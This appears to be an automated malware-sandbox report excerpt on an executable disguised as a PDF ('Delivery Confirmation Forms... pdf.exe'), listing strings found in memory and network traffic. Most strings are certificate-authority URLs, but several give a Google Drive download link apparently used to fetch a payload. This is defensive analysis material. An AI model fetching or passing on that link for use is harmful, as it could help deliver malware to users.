Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2239714955.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290541272.00000000221B0000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp, xnxcxbpC.pif.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2239714955.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290541272.00000000221B0000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp, xnxcxbpC.pif.0.dr	String found in binary or memory: http://ocsp.comodoca.com0$
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2239714955.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290541272.00000000221B0000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp, xnxcxbpC.pif.0.dr	String found in binary or memory: http://www.pmail.com0
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020C1D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downl
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020BF9000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.000000000086E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020BD9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.000000000086E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.0000000000843000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.0000000000862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK&export=download
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK&export=downloade6
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.000000000086E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com:443/download?id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK&export=downlo
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.6:49710 version: TLS 1.2
